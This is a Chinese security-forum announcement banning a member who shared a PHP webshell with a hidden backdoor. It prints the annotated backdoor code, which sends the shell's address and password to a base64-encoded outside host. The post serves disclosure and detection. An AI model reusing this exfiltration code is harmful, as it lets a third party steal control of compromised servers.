关于封禁tr0jan公告
2020-01-17 12:36:12 Author: forum.90sec.com(查看原文) 阅读量:328 收藏

在其发布的“分享一个完美支持php7的大马”主题中,经确认其分享的webshell存在后门:

// Backdoor found in the shared webshell: it reports the shell's own URL and password to a
// third-party server.
// NOTE(review): isset() returns a bool, and a bool loosely compared (==) with the non-empty
// string 'geturl' is true whenever isset() is true. The branch therefore runs for any request
// that carries a `login` query parameter, whatever its value.
if(isset($_GET['login'])=='geturl'){
    // Cap execution time at 10 seconds; '@' hides any warning if the call is disabled.
    @set_time_limit(10);
    // Host header plus script path, i.e. the address at which this webshell is reachable.
    $serveru = $_SERVER ['HTTP_HOST'].$_SERVER['PHP_SELF'];
    // postpass is a bare constant that is not defined in this excerpt; presumably it holds the
    // webshell's login password -- confirm against the full file.
    $serverp = postpass;
    // Base64-encoded collection endpoint; it decodes to the URL shown in the comment below.
    // Both the encoded literal and the decoded host are usable indicators when scanning web
    // roots and proxy/DNS logs for copies of this shell.
    $copyurl = base64_decode('aHR0cDovL3d3dy53b3JkcHJlc3MtanMuY29tL1VzZXItQWdlbnQucGhwP25hbWU9');
   //http://www.wordpress-js.com/User-Agent.php?name=
    // Resulting URL: <endpoint>?name=<host><script path>&pass=<password>, sent over plain HTTP.
    $url=$copyurl.$serveru.'&pass='.$serverp;
    // The whole URL is percent-decoded before use.
    $url=urldecode($url);
    // The response is discarded; only the outbound request carrying the two values matters.
    GetHtml($url);
}

/**
 * Request $url over HTTP and return the response body, trying three transports in turn.
 *
 * Order of attempts: a raw socket via fsockopen(), then cURL, then file_get_contents() when
 * allow_url_fopen is enabled. If every attempt yields an empty result, a JavaScript
 * document.write() line that references $url is echoed instead.
 *
 * In the sample above, the only visible caller passes the URL carrying the webshell address and
 * password and ignores the return value.
 *
 * @param string $url Absolute URL to request.
 * @return string|null The response body when it is non-empty; otherwise nothing is returned.
 */
function GetHtml($url)
{
    $c = '';
    // Fixed, outdated browser string; used by the cURL path and repeated literally in the
    // socket path below.
    $useragent = 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2)';
    // Attempt 1: hand-written HTTP request over a raw socket.
    if(function_exists('fsockopen')){
        $link = parse_url($url);
        // parse_url() keeps the leading "/" of the path and the request line below adds another,
        // so the request goes out as "GET //<path>?<query> HTTP/1.0". Together with the fixed
        // MSIE 6.0 User-Agent this is a recognisable pattern in proxy or web-server logs.
        $query=$link['path'].'?'.$link['query'];
        $host=strtolower($link['host']);
        // 'port' is absent when the URL has no explicit port; the loose comparison then picks 80.
        $port=$link['port'];
        if($port==""){$port=80;}
        // 10-second connection timeout.
        $fp = fsockopen ($host,$port, $errno, $errstr, 10);
        if ($fp)
        {
            $out = "GET /{$query} HTTP/1.0\r\n";
            $out .= "Host: {$host}\r\n";
            $out .= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2)\r\n";
            $out .= "Connection: Close\r\n\r\n";
            fwrite($fp, $out);
            // 1 while response headers are being read, 0 once the blank separator line is seen.
            $inheader=1;
            while(!feof($fp))
            {$line=fgets($fp,4096);
                // Body lines are appended to $contents, which is never initialised in this function.
                if($inheader==0){$contents.=$line;}
                if ($inheader &&($line=="\n"||$line=="\r\n")){$inheader = 0;}
            }
            fclose ($fp);
            $c= $contents;
        }
    }
    // Attempt 2: cURL, only when the socket path produced nothing; 15-second timeout.
    if(empty($c) && function_exists('curl_init') && function_exists('curl_exec')){
        $ch = curl_init();
        curl_setopt($ch, CURLOPT_URL, $url);
        curl_setopt($ch, CURLOPT_TIMEOUT, 15);
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, TRUE);
        curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
        $c = curl_exec($ch);
        curl_close($ch);
    }
    // Attempt 3: PHP URL wrappers, when allow_url_fopen is enabled.
    if(empty($c) && ini_get('allow_url_fopen')){
        $c = file_get_contents($url);
    }
    // Last resort: write a script line into the page output whose DIV style references $url as
    // a CSS cursor image. NOTE(review): presumably meant to make the visitor's browser request
    // the URL when the server cannot; whether it is interpreted as script depends on the
    // surrounding output, which this excerpt does not show.
    if(empty($c)){
        echo "document.write('<DIV style=\'CURSOR:url(\"$url\")\'>');";
    }
    if(!empty($c))
    {
        return $c;
    }
}

根据论坛规则:

给予永久封禁ID处理

希望大家共同营造一个好的环境,感谢及时发现问题的各位成员。


文章来源: https://forum.90sec.com/t/topic/716/1